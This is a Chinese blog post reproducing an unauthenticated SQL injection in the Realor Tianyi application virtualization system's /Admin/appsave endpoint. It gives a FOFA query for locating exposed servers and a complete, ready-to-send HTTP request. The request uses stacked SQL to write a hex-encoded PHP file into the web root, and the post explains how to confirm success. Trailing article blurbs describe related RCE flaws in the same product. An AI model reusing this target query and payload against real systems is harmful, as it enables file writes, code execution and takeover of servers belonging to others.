瑞友天翼应用虚拟化系统 /Admin/appsave 存在SQL注入漏洞

最新推荐文章于 2024-08-31 19:21:08 发布
最新推荐文章于 2024-08-31 19:21:08 发布
阅读量400 收藏
点赞数 7
文章标签: 安全 瑞友天翼应用虚拟化系统 /Admin/appsave SQL注入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/138369599
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞,攻击者可以利用此漏洞获得数据库和WEB主机权限。

资产搜索

‘fofa’

app="REALOR-天翼应用虚拟化系统"

漏洞复现

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f70687020706870696e666f28293b203f3e%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cceshi.xgi%27%23 HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 成功后,访问路径xxxxxxxxxx/ceshi.xgi

cn_大腿
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞复现
0xSec
05-07 1518
瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
漏洞复现】瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI
知黑而守白
06-19 986
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
瑞友天翼应用虚拟化系统SQL注入漏洞
一个努力学习网安的小牛马
05-09 905
瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。瑞友天翼应用虚拟化系统中的 /Home/Controller/AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
瑞友天翼应用虚拟化系统appsave SQL注入漏洞
mashiro_hibiki的博客
05-10 583
1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。瑞友天翼应用虚拟化系统中的/Home/Controller/AdminController 存在 appsave接口无需鉴权并且存在SQL注入瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。将命令进行hex编码执行。访问test.php。
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
m0_46699477的博客
04-11 1336
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
瑞友天翼应用虚拟化系统RCE漏洞复现+利用
热门推荐
0xSec
04-18 2万+
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)。
漏洞复现】瑞友天翼应用虚拟化系统 appsave SQL注入漏洞
qq_67810151的博客
05-09 425
瑞友天翼应用虚拟化系统 appsave接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞执行任意sql语句。
瑞友天翼应用虚拟化系统SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
05-15 284
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。其hmrao.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用攻击者可以利用SQL注入漏洞执行命令,进而控制服务器系统。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现】瑞友天翼应用虚拟化系统-SQL注入-index.php
知黑而守白
07-05 66
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼应用虚拟化系统index.php接口处存在SQL注入漏洞导致程RCE,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
瑞友天翼应用虚拟化系统ConsoleExternalApi.XGI接口SQL注入
weixin_43567873的博客
03-04 194
瑞友天翼应用虚拟化系统ConsoleExternalApi.XGI接口SQL注入
瑞友天翼常见问题集
martian6125 's blog!
03-01 2383
常见问题解答:   1、 Q:登陆应用程序时提示“服务器内部认证失败或者没有足够的登录权限”   A:由于天翼用户绑定的NT系统用户没有设置密码、密码错误或者系统绑定的用户没有加入到remote desktop users里。   2、 Q:打开应用程序的时候,提示“客户端无发连接到远程计算机”   A:15872端口不通,在运行CMD,输入telnet 外网IP加端口号或域名加端...
0day-瑞友应用虚拟化系统-AgentBoard-rce命令执行漏洞
weixin_43167326的博客
03-24 982
瑞友天翼应用虚拟化系统(GWT System)是一款国内具有自主知识产权的应用虚拟化平台,它基于服务器计算技术,致力于为用户提供集中、便捷、安全、高效的虚拟化支撑平台。该系统将用户所有的应用软件(如ERP、OA、CRM等)集中部署在天翼服务器上,客户端只需通过WEB即可快速安全地访问经服务器授权的应用软件,实现集中应用、远程接入和协同办公等功能。同时,瑞友天翼应用虚拟化系统还采用了独特的RAP协议,确保用户能够在任何时间、任何地点,利用任何设备快速访问服务器上的应用软件。
瑞友天翼2024SQL注入漏洞
weixin_44217321的博客
02-28 557
将用户所有应用软件集中部署在天翼服务器,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。操作终端无需再安装应用程序,通过RAP 协议(Remote Application Protocol),可让用户快速访问服务器上的各类应用软件;RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,用户不再受客户端和连接性能要求的限制,达到在任何时间、任何地点,利用任何设备、任何网络连接方式均可高效安全地访问服务器(群)上的应用程序和关键资源。文章置顶连接下载。
瑞友天翼应用虚拟化系统存在远程代码执行漏洞
nnn2188185的博客
04-19 1079
西安瑞友信息技术资讯有限公司是专业从事虚拟化及云计算解决方案提供商。瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。
瑞友天翼应用虚拟化系统V6.0之设备重定向
realorzz的专栏
07-31 4781
瑞友天翼应用虚拟化系统V6.0版本(以下简称瑞友天翼6.0)的设备重定向功能可以实现通过共享设备或将设备重定向到虚拟机的方式支持使用USB设备,使用的时候通过瑞友天翼6.0控制台及客户端的设置,可以将打印机、存储设备和智能卡读卡器等设备重定向,供虚拟环境下用户的使用。   我们来详细了解下瑞友天翼应用虚拟化6.0平台里的设备重定向功能,首先将客户端的USB设备如:智能读卡器接入PC客户端,在瑞
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示
weixin_33754065的博客
10-30 197
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示 前面已经介绍了服务器以及客户端的部署,今天我们来实验使用一下,看用户体验如何以及安全性怎么样! 打开客户端的虚拟化客户端,登陆账号,显示了已经被分配的程序,如图,可以看到,我们已经分配了一个QQ的程序出来, ...
k8s安全
ljj19910401的博客
08-29 711
Kubernetes(k8s)的安全机制是围绕保护其API Server来设计的,主要包括认证(Authentication)、鉴权(Authorization)和准入控制(Admission Control)三个核心环节。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
最新发布
08-31 698
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值